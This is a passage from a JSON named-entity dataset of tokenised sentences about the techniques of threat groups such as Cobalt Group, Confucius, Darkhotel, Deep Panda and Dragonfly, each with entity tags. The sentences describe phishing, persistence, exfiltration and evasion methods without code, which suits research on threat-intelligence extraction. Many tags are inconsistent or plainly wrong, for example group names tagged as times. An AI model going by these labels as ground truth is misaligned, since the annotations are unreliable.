"Remote", "Desktop", "Protocol", "to", "conduct", "lateral", "movement." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "created", "Windows", "tasks", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "used", "a", "JavaScript", "backdoor", "that", "is", "capable", "of", "collecting", "a", "list", "of", "the", "security", "solutions", "installed", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "sent", "spearphishing", "emails", "with", "various", "attachment", "types", "to", "corporate", "and", "personal", "email", "accounts", "of", "victim", "organizations.", "Attachment", "types", "have", "included", ".rtf,", ".doc,", ".xls,", "archives", "containing", "LNK", "files,", "and", "password", "protected", "archives", "containing", ".exe", "and", ".scr", "executables." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "sent", "emails", "with", "URLs", "pointing", "to", "malicious", "documents." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "obtained", "and", "used", "a", "variety", "of", "tools", "including", "Mimikatz,", "PsExec,", "Cobalt", "Strike,", "and", "SDelete." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "Cobalt", "Group", "has", "sent", "Word", "OLE", "compound", "documents", "with", "malicious", "obfuscated", "VBA", "macros", "that", "will", "run", "upon", "user", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "used", "a", "JavaScript", "backdoor", "that", "is", "capable", "of", "launching", "cmd.exe", "to", "execute", "shell", "commands.", "The", "group", "has", "used", "an", "exploit", "toolkit", "known", "as", "Threadkit", "that", "launches", ".bat", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Cobalt", "Group", "has", "created", "new", "services", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Group", "used", "msxsl.exe", "to", "bypass", "AppLocker", "and", "to", "invoke", "Jscript", "code", "from", "an", "XSL", "file." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Confucius", "has", "used", "a", "file", "stealer", "to", "steal", "documents", "and", "images", "with", "the", "following", "extensions:", "txt,", "pdf,", "png,", "jpg,", "doc,", "xls,", "xlm,", "odp,", "ods,", "odt,", "rtf,", "ppt,", "xlsx,", "xlsm,", "docx,", "pptx,", "and", "jpeg." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Confucius", "has", "exfiltrated", "stolen", "files", "to", "its", "C2", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Confucius", "has", "exfiltrated", "victim", "data", "to", "cloud", "storage", "service", "accounts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Confucius", "has", "exploited", "Microsoft", "Office", "vulnerabilities,", "including", "CVE-2015-1641,", "CVE-2017-11882,", "and", "CVE-2018-0802." ], "ner_tags": [ "B-Idus", "O", "O", "I-Exp", "I-Exp", "O", "O", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Confucius", "has", "used", "a", "file", "stealer", "that", "checks", "the", "Document,", "Downloads,", "Desktop,", "and", "Picture", "folders", "for", "documents", "and", "images", "with", "specific", "extensions." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-Features", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Confucius", "has", "downloaded", "additional", "files", "and", "payloads", "onto", "a", "compromised", "host", "following", "initial", "access." ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Confucius", "has", "lured", "victims", "to", "execute", "malicious", "attachments", "included", "in", "crafted", "spearphishing", "emails", "related", "to", "current", "topics." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Confucius", "has", "lured", "victims", "into", "clicking", "on", "a", "malicious", "link", "sent", "through", "spearphishing." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Confucius", "has", "used", "mshta.exe", "to", "execute", "malicious", "VBScript." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Confucius", "has", "used", "PowerShell", "to", "execute", "malicious", "files", "and", "payloads." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Confucius", "has", "dropped", "malicious", "files", "into", "the", "startup", "folder", "`%AppData%\\Microsoft\\Windows\\Start", "Menu\\Programs\\Startup`", "on", "a", "compromised", "host", "in", "order", "to", "maintain", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Confucius", "has", "created", "scheduled", "tasks", "to", "maintain", "persistence", "on", "a", "compromised", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Confucius", "has", "crafted", "and", "sent", "victims", "malicious", "attachments", "to", "gain", "initial", "access." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Confucius", "has", "sent", "malicious", "links", "to", "victims", "through", "email", "campaigns." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-OffAct", "O" ] }, { "tokens": [ "Confucius", "has", "used", "a", "file", "stealer", "that", "can", "examine", "system", "drives,", "including", "those", "other", "than", "the", "C", "drive." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Confucius", "has", "used", "a", "weaponized", "Microsoft", "Word", "document", "with", "an", "embedded", "RTF", "exploit." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "B-Features", "B-Exp" ] }, { "tokens": [ "Confucius", "has", "used", "VBScript", "to", "execute", "malicious", "code." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Confucius", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Confucius", "has", "obtained", "cloud", "storage", "service", "accounts", "to", "host", "stolen", "data." ], "ner_tags": [ "O", "O", "O", "B-Purp", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CopyKittens", "encrypts", "data", "with", "a", "substitute", "cipher", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CopyKittens", "uses", "ZPP,", "a", ".NET", "console", "program,", "to", "compress", "files", "with", "ZIP." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CopyKittens", "digitally", "signed", "an", "executable", "with", "a", "stolen", "certificate", "from", "legitimate", "company", "AI", "Squared." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam" ] }, { "tokens": [ "CopyKittens", "has", "used", "<code>-w", "hidden</code>", "and", "<code>-windowstyle", "hidden</code>", "to", "conceal", "PowerShell", "windows." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "CopyKittens", "has", "used", "PowerShell", "Empire." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O" ] }, { "tokens": [ "CopyKittens", "has", "used", "the", "AirVPN", "service", "for", "operational", "activity." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-OffAct" ] }, { "tokens": [ "CopyKittens", "uses", "rundll32", "to", "load", "various", "tools", "on", "victims,", "including", "a", "lateral", "movement", "tool", "named", "Vminst,", "Cobalt", "Strike,", "and", "shellcode." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "CopyKittens", "has", "used", "Metasploit,", "Empire,", "and", "AirVPN", "for", "post-exploitation", "activities." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Dark", "Caracal", "leveraged", "a", "compiled", "HTML", "file", "that", "contained", "a", "command", "to", "download", "and", "run", "an", "executable." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dark", "Caracal", "collected", "complete", "contents", "of", "the", "'Pictures'", "folder", "from", "compromised", "Windows", "systems." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dark", "Caracal", "leveraged", "a", "watering", "hole", "to", "serve", "up", "malicious", "code." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dark", "Caracal", "has", "obfuscated", "strings", "in", "Bandook", "by", "base64", "encoding,", "and", "then", "encrypting", "them." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dark", "Caracal", "collected", "file", "listings", "of", "all", "default", "Windows", "directories." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dark", "Caracal", "makes", "their", "malware", "look", "like", "Flash", "Player,", "Office,", "or", "PDF", "documents", "in", "order", "to", "entice", "a", "user", "to", "click", "on", "it." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "I-Tool", "O", "B-Tool", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dark", "Caracal's", "version", "of", "Bandook", "adds", "a", "registry", "key", "to", "<code>HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "for", "persistence." ], "ner_tags": [ "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Dark", "Caracal", "took", "screenshots", "using", "their", "Windows", "malware." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Dark", "Caracal", "has", "used", "UPX", "to", "pack", "Bandook." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "Dark", "Caracal", "spearphished", "victims", "via", "Facebook", "and", "Whatsapp." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Org", "O", "B-Time" ] }, { "tokens": [ "Dark", "Caracal's", "version", "of", "Bandook", "communicates", "with", "their", "server", "over", "a", "TCP", "port", "using", "HTTP", "payloads", "Base64", "encoded", "and", "suffixed", "with", "the", "string", "“&&&”." ], "ner_tags": [ "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dark", "Caracal", "has", "used", "macros", "in", "Word", "documents", "that", "would", "download", "a", "second", "stage", "if", "executed." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Tool", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkHydrus", "used", "Template", "Injection", "to", "launch", "an", "authentication", "window", "for", "users", "to", "enter", "their", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkHydrus", "has", "used", "<code>-WindowStyle", "Hidden</code>", "to", "conceal", "PowerShell", "windows." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "DarkHydrus", "has", "sent", "malware", "that", "required", "users", "to", "hit", "the", "enable", "button", "in", "Microsoft", "Excel", "to", "allow", "an", ".iqy", "file", "to", "be", "downloaded." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "DarkHydrus", "leveraged", "PowerShell", "to", "download", "and", "execute", "additional", "scripts", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkHydrus", "has", "sent", "spearphishing", "emails", "with", "password-protected", "RAR", "archives", "containing", "malicious", "Excel", "Web", "Query", "files", "(.iqy).", "The", "group", "has", "also", "sent", "spearphishing", "emails", "that", "contained", "malicious", "Microsoft", "Office", "documents", "that", "use", "the", "“attachedTemplate”", "technique", "to", "load", "a", "template", "from", "a", "remote", "server." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkHydrus", "used", "an", "open-source", "tool,", "Phishery,", "to", "inject", "malicious", "remote", "template", "URLs", "into", "Microsoft", "Word", "documents", "and", "then", "sent", "them", "to", "victims", "to", "enable", "Forced", "Authentication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "DarkHydrus", "has", "obtained", "and", "used", "tools", "such", "as", "Mimikatz,", "Empire,", "and", "Cobalt", "Strike." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "DarkVishnya", "used", "brute-force", "attack", "to", "obtain", "login", "data." ], "ner_tags": [ "B-Idus", "O", "B-Org", "B-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "DarkVishnya", "used", "Bash", "Bunny,", "Raspberry", "Pi,", "netbooks", "or", "inexpensive", "laptops", "to", "connect", "to", "the", "company’s", "local", "network." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "B-Way", "B-Tool", "B-Way", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkVishnya", "performed", "port", "scanning", "to", "obtain", "the", "list", "of", "active", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkVishnya", "scanned", "the", "network", "for", "public", "shared", "folders." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkVishnya", "used", "network", "sniffing", "to", "obtain", "login", "data." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkVishnya", "used", "ports", "5190", "and", "7900", "for", "shellcode", "listeners,", "and", "4444,", "4445,", "31337", "for", "shellcode", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkVishnya", "used", "PowerShell", "to", "create", "shellcode", "loaders." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "DarkVishnya", "used", "DameWare", "Mini", "Remote", "Control", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "DarkVishnya", "has", "obtained", "and", "used", "tools", "such", "as", "Impacket,", "Winexe,", "and", "PsExec." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "DarkVishnya", "created", "new", "services", "for", "shellcode", "loaders", "distribution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "used", "code-signing", "certificates", "on", "its", "malware", "that", "are", "either", "forged", "due", "to", "weak", "keys", "or", "stolen.", "Darkhotel", "has", "also", "stolen", "certificates", "and", "signed", "backdoors", "and", "downloaders", "with", "them." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "decrypted", "strings", "and", "imports", "using", "RC4", "during", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "used", "embedded", "iframes", "on", "hotel", "login", "portals", "to", "redirect", "selected", "victims", "to", "download", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "obfuscated", "code", "using", "RC4,", "XOR,", "and", "RSA." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Darkhotel", "has", "exploited", "Adobe", "Flash", "vulnerability", "CVE-2015-8651", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "used", "malware", "that", "searched", "for", "files", "with", "specific", "patterns." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "used", "first-stage", "payloads", "that", "download", "additional", "malware", "from", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "used", "a", "keylogger." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Darkhotel", "has", "sent", "spearphishing", "emails", "in", "an", "attempt", "to", "lure", "users", "into", "clicking", "on", "a", "malicious", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "used", "malware", "that", "is", "disguised", "as", "a", "Secure", "Shell", "(SSH)", "tool." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O" ] }, { "tokens": [ "Darkhotel", "malware", "can", "collect", "a", "list", "of", "running", "processes", "on", "a", "system." ], "ner_tags": [ "B-Way", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "been", "known", "to", "establish", "persistence", "by", "adding", "programs", "to", "the", "Run", "Registry", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel's", "selective", "infector", "modifies", "executables", "stored", "on", "removable", "media", "as", "a", "method", "of", "spreading", "across", "computers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "searched", "for", "anti-malware", "strings", "and", "anti-virus", "processes", "running", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "sent", "spearphishing", "emails", "with", "malicious", "RAR", "and", ".LNK", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "used", "AES-256", "and", "3DES", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "malware", "has", "used", "a", "series", "of", "checks", "to", "determine", "if", "it's", "being", "analyzed;", "checks", "include", "the", "length", "of", "executable", "names,", "if", "a", "filename", "ends", "with", "<code>.Md5.exe</code>,", "and", "if", "the", "program", "is", "executed", "from", "the", "root", "of", "the", "C:\\", "drive,", "as", "well", "as", "checks", "for", "sandbox-related", "libraries." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "collected", "the", "hostname,", "OS", "version,", "service", "pack", "version,", "and", "the", "processor", "architecture", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "collected", "the", "IP", "address", "and", "network", "adapter", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "malware", "can", "obtain", "system", "time", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "B-Tool", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "used", "a", "virus", "that", "propagates", "by", "infecting", "executables", "stored", "on", "shared", "drives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "used", "malware", "that", "repeatedly", "checks", "the", "mouse", "cursor", "position", "to", "determine", "if", "a", "real", "user", "is", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "malware", "has", "employed", "just-in-time", "decryption", "of", "strings", "to", "evade", "sandbox", "detection." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Darkhotel", "has", "dropped", "an", "mspaint.lnk", "shortcut", "to", "disk", "which", "launches", "a", "shell", "script", "that", "downloads", "and", "executes", "a", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Deep", "Panda", "has", "used", "the", "sticky-keys", "technique", "to", "bypass", "the", "RDP", "login", "screen", "on", "remote", "systems", "during", "intrusions." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Deep", "Panda", "has", "used", "<code>-w", "hidden</code>", "to", "conceal", "PowerShell", "windows", "by", "setting", "the", "WindowStyle", "parameter", "to", "hidden." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Deep", "Panda", "has", "updated", "and", "modified", "its", "malware,", "resulting", "in", "different", "hash", "values", "that", "evade", "detection." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Deep", "Panda", "has", "used", "PowerShell", "scripts", "to", "download", "and", "execute", "programs", "in", "memory,", "without", "writing", "to", "disk." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Deep", "Panda", "uses", "the", "Microsoft", "Tasklist", "utility", "to", "list", "processes", "running", "on", "systems." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Deep", "Panda", "has", "used", "regsvr32.exe", "to", "execute", "a", "server", "variant", "of", "Derusbi", "in", "victim", "networks." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Deep", "Panda", "has", "used", "ping", "to", "identify", "other", "machines", "of", "interest." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Deep", "Panda", "uses", "net.exe", "to", "connect", "to", "network", "shares", "using", "<code>net", "use</code>", "commands", "with", "compromised", "credentials." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Deep", "Panda", "uses", "Web", "shells", "on", "publicly", "accessible", "Web", "servers", "to", "access", "victim", "networks." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Deep", "Panda", "group", "is", "known", "to", "utilize", "WMI", "for", "lateral", "movement." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "added", "newly", "created", "accounts", "to", "the", "administrators", "group", "to", "maintain", "elevated", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Dragonfly", "has", "compressed", "data", "into", ".zip", "files", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "attempted", "to", "brute", "force", "credentials", "to", "gain", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "collected", "open", "source", "information", "to", "identify", "relationships", "between", "organizations", "for", "targeting", "purposes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "cleared", "Windows", "event", "logs", "and", "other", "logs", "produced", "by", "tools", "they", "used,", "including", "system,", "security,", "terminal", "services,", "remote", "services,", "and", "audit", "logs.", "The", "actors", "also", "deleted", "specific", "Registry", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", 